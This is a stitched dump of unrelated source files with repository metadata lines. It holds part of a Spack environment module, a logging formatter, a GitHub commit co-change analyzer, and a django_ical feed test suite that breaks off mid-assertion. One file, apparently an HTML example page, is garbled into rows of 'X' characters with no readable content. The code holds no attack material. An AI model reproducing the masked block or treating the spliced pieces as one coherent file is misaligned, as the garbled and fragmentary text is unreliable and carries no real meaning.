self.concretized_user_specs = [Spec(r['spec']) for r in roots]
self.concretized_order = [r['hash'] for r in roots]
json_specs_by_hash = d['concrete_specs']
root_hashes = set(self.concretized_order)
specs_by_hash = {}
for dag_hash, node_dict in json_specs_by_hash.items():
specs_by_hash[dag_hash] = Spec.from_node_dict(node_dict)
for dag_hash, node_dict in json_specs_by_hash.items():
for dep_name, dep_hash, deptypes in (
Spec.dependencies_from_node_dict(node_dict)):
specs_by_hash[dag_hash]._add_dependency(
specs_by_hash[dep_hash], deptypes)
# If we are reading an older lockfile format (which uses dag hashes
# that exclude build deps), we use this to convert the old
# concretized_order to the full hashes (preserving the order)
old_hash_to_new = {}
self.specs_by_hash = {}
for _, spec in specs_by_hash.items():
dag_hash = spec.dag_hash()
build_hash = spec.build_hash()
if dag_hash in root_hashes:
old_hash_to_new[dag_hash] = build_hash
if (dag_hash in root_hashes or build_hash in root_hashes):
self.specs_by_hash[build_hash] = spec
if old_hash_to_new:
# Replace any older hashes in concretized_order with hashes
# that include build deps
self.concretized_order = [
old_hash_to_new.get(h, h) for h in self.concretized_order]
def write(self, regenerate_views=True):
"""Writes an in-memory environment to its location on disk.
Write out package files for each newly concretized spec. Also
regenerate any views associated with the environment, if
regenerate_views is True.
Arguments:
regenerate_views (bool): regenerate views as well as
writing if True.
"""
# Intercept environment not using the latest schema format and prevent
# them from being modified
manifest_exists = os.path.exists(self.manifest_path)
if manifest_exists and not is_latest_format(self.manifest_path):
msg = ('The environment "{0}" needs to be written to disk, but '
'is currently using a deprecated format. Please update it '
'using:\n\n'
'\tspack env update {0}\n\n'
'Note that previous versions of Spack will not be able to '
'use the updated configuration.')
raise RuntimeError(msg.format(self.name))
# ensure path in var/spack/environments
fs.mkdirp(self.path)
yaml_dict = config_dict(self.yaml)
raw_yaml_dict = config_dict(self.raw_yaml)
if self.specs_by_hash:
# ensure the prefix/.env directory exists
fs.mkdirp(self.env_subdir_path)
for spec in self.new_specs:
for dep in spec.traverse():
if not dep.concrete:
raise ValueError('specs passed to environment.write() '
'must be concrete!')
root = os.path.join(self.repos_path, dep.namespace)
repo = spack.repo.create_or_construct(root, dep.namespace)
pkg_dir = repo.dirname_for_package_name(dep.name)
fs.mkdirp(pkg_dir)
spack.repo.path.dump_provenance(dep, pkg_dir)
self.new_specs = []
# write the lock file last
with fs.write_tmp_and_move(self.lock_path) as f:
sjson.dump(self._to_lockfile_dict(), stream=f)
else:
if os.path.exists(self.lock_path):
os.unlink(self.lock_path)
# invalidate _repo cache
self._repo = None
# put any changes in the definitions in the YAML
for name, speclist in self.spec_lists.items():
if name == user_speclist_name:
# The primary list is handled differently
continue
active_yaml_lists = [x for x in yaml_dict.get('definitions', [])
if name in x and
_eval_conditional(x.get('when', 'True'))]
# Remove any specs in yaml that are not in internal representation
for ayl in active_yaml_lists:
# If it's not a string, it's a matrix. Those can't have changed
# If it is a string that starts with '$', it's a reference.
# Those also can't have changed.
ayl[name][:] = [s for s in ayl.setdefault(name, [])
if (not isinstance(s, six.string_types)) or
s.startswith('$') or Spec(s) in speclist.specs]
# Put the new specs into the first active list from the yaml
new_specs = [entry for entry in speclist.yaml_list
if isinstance(entry, six.string_types) and
not any(entry in ayl[name]
for ayl in active_yaml_lists)]
list_for_new_specs = active_yaml_lists[0].setdefault(name, [])
list_for_new_specs[:] = list_for_new_specs + new_specs
# put the new user specs in the YAML.
# This can be done directly because there can't be multiple definitions
# nor when clauses for `specs` list.
yaml_spec_list = yaml_dict.setdefault(user_speclist_name,
[])
yaml_spec_list[:] = self.user_specs.yaml_list
# Construct YAML representation of view
default_name = default_view_name
if self.views and len(self.views) == 1 and default_name in self.views:
path = self.default_view.root
if self.default_view == ViewDescriptor(self.path,
self.view_path_default):
view = True
elif self.default_view == ViewDescriptor(self.path, path):
view = path
else:
view = dict((name, view.to_dict())
for name, view in self.views.items())
elif self.views:
view = dict((name, view.to_dict())
for name, view in self.views.items())
else:
view = False
yaml_dict['view'] = view
# Remove yaml sections that are shadowing defaults
# construct garbage path to ensure we don't find a manifest by accident
with fs.temp_cwd() as env_dir:
bare_env = Environment(env_dir, with_view=self.view_path_default)
keys_present = list(yaml_dict.keys())
for key in keys_present:
if yaml_dict[key] == config_dict(bare_env.yaml).get(key, None):
if key not in raw_yaml_dict:
del yaml_dict[key]
# if all that worked, write out the manifest file at the top level
# (we used to check whether the yaml had changed and not write it out
# if it hadn't. We can't do that anymore because it could be the only
# thing that changed is the "override" attribute on a config dict,
# which would not show up in even a string comparison between the two
# keys).
changed = not yaml_equivalent(self.yaml, self.raw_yaml)
written = os.path.exists(self.manifest_path)
if changed or not written:
self.raw_yaml = copy.deepcopy(self.yaml)
with fs.write_tmp_and_move(self.manifest_path) as f:
_write_yaml(self.yaml, f)
# TODO: rethink where this needs to happen along with
# writing. For some of the commands (like install, which write
# concrete specs AND regen) this might as well be a separate
# call. But, having it here makes the views consistent witht the
# concretized environment for most operations. Which is the
# special case?
if regenerate_views:
self.regenerate_views()
def __enter__(self):
self._previous_active = _active_environment
activate(self)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
deactivate()
if self._previous_active:
activate(self._previous_active)
def yaml_equivalent(first, second):
"""Returns whether two spack yaml items are equivalent, including overrides
"""
if isinstance(first, dict):
return isinstance(second, dict) and _equiv_dict(first, second)
elif isinstance(first, list):
return isinstance(second, list) and _equiv_list(first, second)
else: # it's a string
return isinstance(second, six.string_types) and first == second
def _equiv_list(first, second):
"""Returns whether two spack yaml lists are equivalent, including overrides
"""
if len(first) != len(second):
return False
return all(yaml_equivalent(f, s) for f, s in zip(first, second))
def _equiv_dict(first, second):
"""Returns whether two spack yaml dicts are equivalent, including overrides
"""
if len(first) != len(second):
return False
same_values = all(yaml_equivalent(fv, sv)
for fv, sv in zip(first.values(), second.values()))
same_keys_with_same_overrides = all(
fk == sk and getattr(fk, 'override', False) == getattr(sk, 'override',
False)
for fk, sk in zip(first.keys(), second.keys()))
return same_values and same_keys_with_same_overrides
def display_specs(concretized_specs):
"""Displays the list of specs returned by `Environment.concretize()`.
Args:
concretized_specs (list): list of specs returned by
`Environment.concretize()`
"""
def _tree_to_display(spec):
return spec.tree(
recurse_dependencies=True,
status_fn=spack.spec.Spec.install_status,
hashlen=7, hashes=True)
for user_spec, concrete_spec in concretized_specs:
tty.msg('Concretized {0}'.format(user_spec))
sys.stdout.write(_tree_to_display(concrete_spec))
print('')
def _concretize_from_constraints(spec_constraints):
# Accept only valid constraints from list and concretize spec
# Get the named spec even if out of order
root_spec = [s for s in spec_constraints if s.name]
if len(root_spec) != 1:
m = 'The constraints %s are not a valid spec ' % spec_constraints
m += 'concretization target. all specs must have a single name '
m += 'constraint for concretization.'
raise InvalidSpecConstraintError(m)
spec_constraints.remove(root_spec[0])
invalid_constraints = []
while True:
# Attach all anonymous constraints to one named spec
s = root_spec[0].copy()
for c in spec_constraints:
if c not in invalid_constraints:
s.constrain(c)
try:
return s.concretized()
except spack.spec.InvalidDependencyError as e:
invalid_deps_string = ['^' + d for d in e.invalid_deps]
invalid_deps = [c for c in spec_constraints
if any(c.satisfies(invd, strict=True)
for invd in invalid_deps_string)]
if len(invalid_deps) != len(invalid_deps_string):
raise e
invalid_constraints.extend(invalid_deps)
except UnknownVariantError as e:
invalid_variants = e.unknown_variants
inv_variant_constraints = [c for c in spec_constraints
if any(name in c.variants
for name in invalid_variants)]
if len(inv_variant_constraints) != len(invalid_variants):
raise e
invalid_constraints.extend(inv_variant_constraints)
def make_repo_path(root):
"""Make a RepoPath from the repo subdirectories in an environment."""
path = spack.repo.RepoPath()
if os.path.isdir(root):
for repo_root in os.listdir(root):
repo_root = os.path.join(root, repo_root)
if not os.path.isdir(repo_root):
continue
repo = spack.repo.Repo(repo_root)
path.put_last(repo)
return path
def prepare_config_scope(env):
"""Add env's scope to the global configuration search path."""
for scope in env.config_scopes():
spack.config.config.push_scope(scope)
def deactivate_config_scope(env):
"""Remove any scopes from env from the global config path."""
for scope in env.config_scopes():
spack.config.config.remove_scope(scope.name)
def manifest_file(env_name_or_dir):
"""Return the absolute path to a manifest file given the environment
name or directory.
Args:
env_name_or_dir (str): either the name of a valid environment
or a directory where a manifest file resides
Raises:
AssertionError: if the environment is not found
"""
env_dir = None
if is_env_dir(env_name_or_dir):
env_dir = os.path.abspath(env_name_or_dir)
elif exists(env_name_or_dir):
env_dir = os.path.abspath(root(env_name_or_dir))
assert env_dir, "environment not found [env={0}]".format(env_name_or_dir)
return os.path.join(env_dir, manifest_name)
def update_yaml(manifest, backup_file):
"""Update a manifest file from an old format to the current one.
Args:
manifest (str): path to a manifest file
backup_file (str): file where to copy the original manifest
Returns:
True if the manifest was updated, False otherwise.
Raises:
AssertionError: in case anything goes wrong during the update
"""
# Check if the environment needs update
with open(manifest) as f:
data = syaml.load(f)
top_level_key = _top_level_key(data)
needs_update = spack.schema.env.update(data[top_level_key])
if not needs_update:
msg = "No update needed [manifest={0}]".format(manifest)
tty.debug(msg)
return False
# Copy environment to a backup file and update it
msg = ('backup file "{0}" already exists on disk. Check its content '
'and remove it before trying to update again.')
assert not os.path.exists(backup_file), msg.format(backup_file)
shutil.copy(manifest, backup_file)
with open(manifest, 'w') as f:
syaml.dump_config(data, f)
return True
def _top_level_key(data):
"""Return the top level key used in this environment
Args:
data (dict): raw yaml data of the environment
Returns:
Either 'spack' or 'env'
"""
msg = ('cannot find top level attribute "spack" or "env"'
'in the environment')
assert any(x in data for x in ('spack', 'env')), msg
if 'spack' in data:
return 'spack'
return 'env'
def is_latest_format(manifest):
"""Return True if the manifest file is at the latest schema format,
False otherwise.
Args:
manifest (str): manifest file to be analyzed
"""
with open(manifest) as f:
data = syaml.load(f)
top_level_key = _top_level_key(data)
changed = spack.schema.env.update(data[top_level_key])
return not changed
class SpackEnvironmentError(spack.error.SpackError):
"""Superclass for all errors to do with Spack environments."""
| lgpl-2.1 | -7,866,164,561,951,928,000 | 36.55805 | 79 | 0.589361 | false |
crowsonkb/style_transfer | log_utils.py | 1 | 3838 | import logging
import os
import sys
try:
import curses
except ImportError:
curses = None
def _stderr_supports_color():
color = False
if curses and hasattr(sys.stderr, 'isatty') and sys.stderr.isatty():
try:
curses.setupterm()
if curses.tigetnum("colors") > 0:
color = True
except Exception:
pass
return color
class LogFormatter(logging.Formatter):
"""Log formatter originally from Tornado and modified."""
DEFAULT_FORMAT = '%(color)s[%(levelname)1.1s %(asctime)s %(process)d]%(end_color)s %(message)s'
DEFAULT_DATE_FORMAT = '%y%m%d %H:%M:%S'
DEFAULT_COLORS = {
logging.DEBUG: 4, # Blue
logging.INFO: 2, # Green
logging.WARNING: 3, # Yellow
logging.ERROR: 1, # Red
}
def __init__(self, color=True, fmt=DEFAULT_FORMAT, datefmt=DEFAULT_DATE_FORMAT,
colors=DEFAULT_COLORS, precision=3):
r"""
:arg bool color: Enables color support.
:arg string fmt: Log message format.
It will be applied to the attributes dict of log records. The
text between ``%(color)s`` and ``%(end_color)s`` will be colored
depending on the level if color support is on.
:arg dict colors: color mappings from logging level to terminal color
code
:arg string datefmt: Datetime format.
Used for formatting ``(asctime)`` placeholder in ``prefix_fmt``.
.. versionchanged:: 3.2
Added ``fmt`` and ``datefmt`` arguments.
"""
super().__init__()
self.default_time_format = datefmt
self.precision = precision
self.default_msec_format = ''
self._fmt = fmt
self._colors = {}
if color and _stderr_supports_color():
fg_color = (curses.tigetstr('setaf') or
curses.tigetstr('setf') or '')
for levelno, code in colors.items():
self._colors[levelno] = curses.tparm(fg_color, code).decode()
self._normal = curses.tigetstr('sgr0').decode()
else:
self._normal = ''
def format(self, record):
record.message = record.getMessage()
record.asctime = self.formatTime(record)
if record.levelno in self._colors:
record.color = self._colors[record.levelno]
record.end_color = self._normal
else:
record.color = record.end_color = ''
formatted = self._fmt % record.__dict__
if record.exc_info:
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
lines = [formatted.rstrip()]
lines.extend(ln for ln in record.exc_text.split('\n'))
formatted = '\n'.join(lines)
return formatted.replace('\n', '\n ')
def formatTime(self, record, datefmt=None):
if not datefmt:
datefmt = self.default_time_format
fmttime = super().formatTime(record, datefmt)
if self.precision >= 4:
return '%s.%06d' % (fmttime, record.msecs*1000)
if self.precision >= 1:
return '%s.%03d' % (fmttime, record.msecs)
return fmttime
def setup_logger(name=None, level=None, formatter_opts=None):
"""Sets up pretty logging using LogFormatter."""
if formatter_opts is None:
formatter_opts = {}
logging.captureWarnings(True)
logger = logging.getLogger(name)
if 'DEBUG' in os.environ:
level = logging.DEBUG
elif level is None:
level = logging.INFO
logger.setLevel(level)
channel = logging.StreamHandler()
formatter = LogFormatter(**formatter_opts)
channel.setFormatter(formatter)
logger.addHandler(channel)
return logger
| mit | 4,683,264,071,271,343,000 | 32.964602 | 99 | 0.585201 | false |
itu-oss-project-team/oss-github-analysis-project | github_analysis_tool/analyzer/commit_based_analyzer.py | 1 | 2535 | import collections
from github_analysis_tool.analyzer.abstract_analyzer import AbstractAnalyzer
from github_analysis_tool.services.db_column_constants import Columns
class CommitBasedAnalyzer(AbstractAnalyzer):
def __init__(self):
AbstractAnalyzer.__init__(self, "commit")
def create_matrix(self, repo_id):
commit_matrix = collections.OrderedDict() # {<commit1>:{<commit2>:<shared_file_changes>}
commit_file_counts = collections.OrderedDict() # {<commit>:<file_count>}
repo_files = self._databaseService.get_files_of_repo(repo_id, get_only_file_paths=True)
# For every file in repo
for file_name in repo_files:
commits_of_file = self._databaseService.get_commits_of_file(repo_id, file_name, get_only_ids=True)
for commit in commits_of_file:
# Count how many files are there in each commit so we can normalize our matrix later with these counts
self.__increment_commit_file_count(commit_file_counts, commit)
for commit_1 in commits_of_file:
for commit_2 in commits_of_file:
# For every commit pair that edits this same file
self.__increment_file_count(commit_matrix, commit_1, commit_2)
self.__normalize_matrix(commit_matrix, commit_file_counts)
return commit_matrix
def __increment_file_count(self, commit_matrix, commit_1, commit_2):
if commit_1 == commit_2:
return
if commit_1 not in commit_matrix:
commit_matrix[commit_1] = {}
if commit_2 in commit_matrix[commit_1]:
commit_matrix[commit_1][commit_2] += 1
else:
commit_matrix[commit_1][commit_2] = 1
def __increment_commit_file_count(self, commit_file_counts, commit):
if commit not in commit_file_counts:
commit_file_counts[commit] = 1
else:
commit_file_counts[commit] += 1
def __normalize_matrix(self, commit_matrix, commit_file_counts):
for commit_1 in commit_matrix.keys():
for commit_2 in commit_matrix.keys():
if commit_2 not in commit_matrix[commit_1]:
continue
intersectCount = commit_matrix[commit_1][commit_2]
unionCount = commit_file_counts[commit_1] + commit_file_counts[commit_2] - intersectCount
test = intersectCount / unionCount
commit_matrix[commit_1][commit_2] = intersectCount / unionCount
| mit | -7,743,140,120,545,697,000 | 43.473684 | 118 | 0.624852 | false |
dnaextrim/django_adminlte_x | adminlte/static/plugins/datatables/extensions/Responsive/examples/styling/index.html.py | 1 | 2421 | XXXXXXXXX XXXXX
XXXXXX
XXXXXX
XXXXX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX XXXXXXXX X XXXXXXXXXXXXXXX
XXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXXXX
XXXXXXXXX
XXXXXXXXXXXXXX XXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXX
XXXXXXXXXXXXX XXXXXXXX XXXX XXXXXX XXXXXXX XXXXXXXXXXX XX XXX XXXX XXXX XXXXXXX XXXXXX XXXX XXX XXX XXXXX XXX XXXXXXX XXXX XXX XXXXX XXX XXXX XXXXXXXXXX XX XXXXX
XXXXXXXXXXX XXXXXXXXXX XXXX XXXX XXXXXXXXXXX XXXXXX XX XX XXXXXX XX XXXXXXXXX XXX XXXXXXXXXX XXX XXXX XXXXXXXXXXX XXXX XXXXXXX XXXXX XXXXXXXXXX XXXXX XXXXXXX XXXXX
XXXXXXXX XXX XXXXXXXXXXXXXXX
XXXXXX
XXXXXXXXXX
XXXXXX
XXXXXXXXX
XXXX XXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX XXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXX
XXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXXXXXXX
XXXXXXXXX XXXXX XX XXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXX XXX XXXX XXXXXXXXXXX XXXXX XXX XXX XXXXXXXXXX XXX XXXXXXXXXXXX
XXXXXXXXXXXXX XXXXX XXX X XXXX XXXXX XX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXX XXX XXXXXXXXXXXX XX XXXXXXXXXXXXXXX
XX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXX XXX XXXXXXX XX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX XXXXXX XXXXXXXXXXXXX
XXXXXXXXXX XX XXXXXXXX XXXXX XXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXX
XXXXXX
XXXXXX
XXXXXXXXXX
XXXXXXX
XXXXXXX | mit | -5,425,496,570,000,140,000 | 41.491228 | 167 | 0.857497 | false |
Pinkerton/django-ical | django_ical/tests/test_feed.py | 1 | 15645 | from datetime import date
from datetime import datetime
from os import linesep
from django.test import TestCase
from django.test.client import RequestFactory
import icalendar
import pytz
from django_ical import utils
from django_ical.feedgenerator import ICal20Feed
from django_ical.views import ICalFeed
class TestICalFeed(ICalFeed):
feed_type = ICal20Feed
title = "Test Feed"
description = "Test ICal Feed"
items = []
class TestItemsFeed(ICalFeed):
feed_type = ICal20Feed
title = "Test Feed"
description = "Test ICal Feed"
def items(self):
return [
{
"title": "Title1",
"description": "Description1",
"link": "/event/1",
"start": datetime(2012, 5, 1, 18, 0),
"end": datetime(2012, 5, 1, 20, 0),
"recurrences": {
"rrules": [
utils.build_rrule(freq="DAILY", byhour=10),
utils.build_rrule(freq="MONTHLY", bymonthday=4),
],
"xrules": [
utils.build_rrule(freq="MONTHLY", bymonthday=-4),
utils.build_rrule(freq="MONTHLY", byday="+3TU"),
],
"rdates": [date(1999, 9, 2), date(1998, 1, 1)],
"xdates": [date(1999, 8, 1), date(1998, 2, 1)],
},
"geolocation": (37.386013, -122.082932),
"organizer": "[email protected]",
"participants": [
{
"email": "[email protected]",
"cn": "Joe Unresponsive",
"partstat": "NEEDS-ACTION",
},
{
"email": "[email protected]",
"cn": "Jane Attender",
"partstat": "ACCEPTED",
},
{
"email": "[email protected]",
"cn": "Dan Decliner",
"partstat": "DECLINED",
},
{
"email": "[email protected]",
"cn": "Mary Maybe",
"partstat": "TENTATIVE",
},
],
"modified": datetime(2012, 5, 2, 10, 0),
},
{
"title": "Title2",
"description": "Description2",
"link": "/event/2",
"start": datetime(2012, 5, 6, 18, 0),
"end": datetime(2012, 5, 6, 20, 0),
"recurrences": {
"rrules": [
utils.build_rrule(
freq="WEEKLY", byday=["MO", "TU", "WE", "TH", "FR"]
)
],
"xrules": [utils.build_rrule(freq="MONTHLY", byday="-3TU")],
"rdates": [date(1997, 9, 2)],
"xdates": [date(1997, 8, 1)],
},
"geolocation": (37.386013, -122.082932),
"modified": datetime(2012, 5, 7, 10, 0),
"organizer": {
"cn": "John Doe",
"email": "[email protected]",
"role": "CHAIR",
},
},
]
def item_title(self, obj):
return obj["title"]
def item_description(self, obj):
return obj["description"]
def item_start_datetime(self, obj):
return obj["start"]
def item_end_datetime(self, obj):
return obj["end"]
def item_rrule(self, obj):
return obj["recurrences"]["rrules"]
def item_exrule(self, obj):
return obj["recurrences"]["xrules"]
def item_rdate(self, obj):
return obj["recurrences"]["rdates"]
def item_exdate(self, obj):
return obj["recurrences"]["xdates"]
def item_link(self, obj):
return obj["link"]
def item_geolocation(self, obj):
return obj.get("geolocation", None)
def item_updateddate(self, obj):
return obj.get("modified", None)
def item_pubdate(self, obj):
return obj.get("modified", None)
def item_organizer(self, obj):
organizer_dic = obj.get("organizer", None)
if organizer_dic:
if isinstance(organizer_dic, dict):
organizer = icalendar.vCalAddress("MAILTO:%s" % organizer_dic["email"])
for key, val in organizer_dic.items():
if key is not "email":
organizer.params[key] = icalendar.vText(val)
else:
organizer = icalendar.vCalAddress("MAILTO:%s" % organizer_dic)
return organizer
def item_attendee(self, obj):
""" All calendars support ATTENDEE attribute, however, at this time, Apple calendar (desktop & iOS) and Outlook
display event attendees, while Google does not. For SUBSCRIBED calendars it seems that it is not possible to
use the default method to respond. As an alternative, you may review adding custom links to your description
or setting up something like CalDav with authentication, which can enable the ability for attendees to respond
via the default icalendar protocol."""
participants = obj.get("participants", None)
if participants:
attendee_list = list()
default_attendee_params = {
"cutype": icalendar.vText("INDIVIDUAL"),
"role": icalendar.vText("REQ-PARTICIPANT"),
"rsvp": icalendar.vText(
"TRUE"
), # Does not seem to work for subscribed calendars.
}
for participant in participants:
attendee = icalendar.vCalAddress("MAILTO:%s" % participant.pop("email"))
participant_dic = default_attendee_params.copy()
participant_dic.update(participant)
for key, val in participant_dic.items():
attendee.params[key] = icalendar.vText(val)
attendee_list.append(attendee)
return attendee_list
class TestFilenameFeed(ICalFeed):
feed_type = ICal20Feed
title = "Test Filename Feed"
description = "Test ICal Feed"
def get_object(self, request):
return {"id": 123}
def items(self, obj):
return [obj]
def file_name(self, obj):
return "%s.ics" % obj["id"]
def item_link(self, item):
return "" # Required by the syndication framework
class ICal20FeedTest(TestCase):
def test_basic(self):
request = RequestFactory().get("/test/ical")
view = TestICalFeed()
response = view(request)
calendar = icalendar.Calendar.from_ical(response.content)
self.assertEquals(calendar["X-WR-CALNAME"], "Test Feed")
self.assertEquals(calendar["X-WR-CALDESC"], "Test ICal Feed")
def test_items(self):
request = RequestFactory().get("/test/ical")
view = TestItemsFeed()
response = view(request)
calendar = icalendar.Calendar.from_ical(response.content)
self.assertEquals(len(calendar.subcomponents), 2)
self.assertEquals(calendar.subcomponents[0]["SUMMARY"], "Title1")
self.assertEquals(calendar.subcomponents[0]["DESCRIPTION"], "Description1")
self.assertTrue(calendar.subcomponents[0]["URL"].endswith("/event/1"))
self.assertEquals(
calendar.subcomponents[0]["DTSTART"].to_ical(), b"20120501T180000"
)
self.assertEquals(
calendar.subcomponents[0]["DTEND"].to_ical(), b"20120501T200000"
)
self.assertEquals(
calendar.subcomponents[0]["GEO"].to_ical(), "37.386013;-122.082932"
)
self.assertEquals(
calendar.subcomponents[0]["LAST-MODIFIED"].to_ical(), b"20120502T100000Z"
)
self.assertEquals(
calendar.subcomponents[0]["ORGANIZER"].to_ical(),
b"MAILTO:[email protected]",
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][0].to_ical(),
b"MAILTO:[email protected]",
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][0].params.to_ical(),
b'CN="Joe Unresponsive";CUTYPE=INDIVIDUAL;PARTSTAT=NEEDS-ACTION;ROLE=REQ-PARTICIPANT;'
b"RSVP=TRUE",
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][1].to_ical(),
b"MAILTO:[email protected]",
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][1].params.to_ical(),
b'CN="Jane Attender";CUTYPE=INDIVIDUAL;PARTSTAT=ACCEPTED;ROLE=REQ-PARTICIPANT;RSVP=TRUE',
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][2].to_ical(),
b"MAILTO:[email protected]",
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][2].params.to_ical(),
b'CN="Dan Decliner";CUTYPE=INDIVIDUAL;PARTSTAT=DECLINED;ROLE=REQ-PARTICIPANT;RSVP=TRUE',
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][3].to_ical(),
b"MAILTO:[email protected]",
)
self.assertEquals(
calendar.subcomponents[0]["ATTENDEE"][3].params.to_ical(),
b'CN="Mary Maybe";CUTYPE=INDIVIDUAL;PARTSTAT=TENTATIVE;ROLE=REQ-PARTICIPANT;RSVP=TRUE',
)
self.assertEquals(
calendar.subcomponents[0]["RRULE"][0].to_ical(), b"FREQ=DAILY;BYHOUR=10"
)
self.assertEquals(
calendar.subcomponents[0]["RRULE"][1].to_ical(),
b"FREQ=MONTHLY;BYMONTHDAY=4",
)
self.assertEquals(
calendar.subcomponents[0]["EXRULE"][0].to_ical(),
b"FREQ=MONTHLY;BYMONTHDAY=-4",
)
self.assertEquals(
calendar.subcomponents[0]["EXRULE"][1].to_ical(), b"FREQ=MONTHLY;BYDAY=+3TU"
)
self.assertEquals(
calendar.subcomponents[0]["RDATE"].to_ical(), b"19990902,19980101"
)
self.assertEquals(
calendar.subcomponents[0]["EXDATE"].to_ical(), b"19990801,19980201"
)
self.assertEquals(calendar.subcomponents[1]["SUMMARY"], "Title2")
self.assertEquals(calendar.subcomponents[1]["DESCRIPTION"], "Description2")
self.assertTrue(calendar.subcomponents[1]["URL"].endswith("/event/2"))
self.assertEquals(
calendar.subcomponents[1]["DTSTART"].to_ical(), b"20120506T180000"
)
self.assertEquals(
calendar.subcomponents[1]["DTEND"].to_ical(), b"20120506T200000"
)
self.assertEquals(
calendar.subcomponents[1]["RRULE"].to_ical(),
b"FREQ=WEEKLY;BYDAY=MO,TU,WE,TH,FR",
)
self.assertEquals(
calendar.subcomponents[1]["EXRULE"].to_ical(), b"FREQ=MONTHLY;BYDAY=-3TU"
)
self.assertEquals(calendar.subcomponents[1]["RDATE"].to_ical(), b"19970902")
self.assertEquals(calendar.subcomponents[1]["EXDATE"].to_ical(), b"19970801")
self.assertEquals(
calendar.subcomponents[1]["GEO"].to_ical(), "37.386013;-122.082932"
)
self.assertEquals(
calendar.subcomponents[1]["LAST-MODIFIED"].to_ical(), b"20120507T100000Z"
)
self.assertEquals(
calendar.subcomponents[1]["ORGANIZER"].to_ical(),
b"MAILTO:[email protected]",
)
def test_wr_timezone(self):
"""
Test for the x-wr-timezone property.
"""
class TestTimezoneFeed(TestICalFeed):
timezone = "Asia/Tokyo"
request = RequestFactory().get("/test/ical")
view = TestTimezoneFeed()
response = view(request)
calendar = icalendar.Calendar.from_ical(response.content)
self.assertEquals(calendar["X-WR-TIMEZONE"], "Asia/Tokyo")
def test_timezone(self):
tokyo = pytz.timezone("Asia/Tokyo")
us_eastern = pytz.timezone("US/Eastern")
class TestTimezoneFeed(TestItemsFeed):
def items(self):
return [
{
"title": "Title1",
"description": "Description1",
"link": "/event/1",
"start": datetime(2012, 5, 1, 18, 00, tzinfo=tokyo),
"end": datetime(2012, 5, 1, 20, 00, tzinfo=tokyo),
"recurrences": {
"rrules": [],
"xrules": [],
"rdates": [],
"xdates": [],
},
},
{
"title": "Title2",
"description": "Description2",
"link": "/event/2",
"start": datetime(2012, 5, 6, 18, 00, tzinfo=us_eastern),
"end": datetime(2012, 5, 6, 20, 00, tzinfo=us_eastern),
"recurrences": {
"rrules": [],
"xrules": [],
"rdates": [],
"xdates": [],
},
},
]
request = RequestFactory().get("/test/ical")
view = TestTimezoneFeed()
response = view(request)
calendar = icalendar.Calendar.from_ical(response.content)
self.assertEquals(len(calendar.subcomponents), 2)
self.assertEquals(
calendar.subcomponents[0]["DTSTART"].to_ical(), b"20120501T180000"
)
self.assertEquals(
calendar.subcomponents[0]["DTSTART"].params["TZID"], "Asia/Tokyo"
)
self.assertEquals(
calendar.subcomponents[0]["DTEND"].to_ical(), b"20120501T200000"
)
self.assertEquals(
calendar.subcomponents[0]["DTEND"].params["TZID"], "Asia/Tokyo"
)
self.assertEquals(
calendar.subcomponents[1]["DTSTART"].to_ical(), b"20120506T180000"
)
self.assertEquals(
calendar.subcomponents[1]["DTSTART"].params["TZID"], "US/Eastern"
)
self.assertEquals(
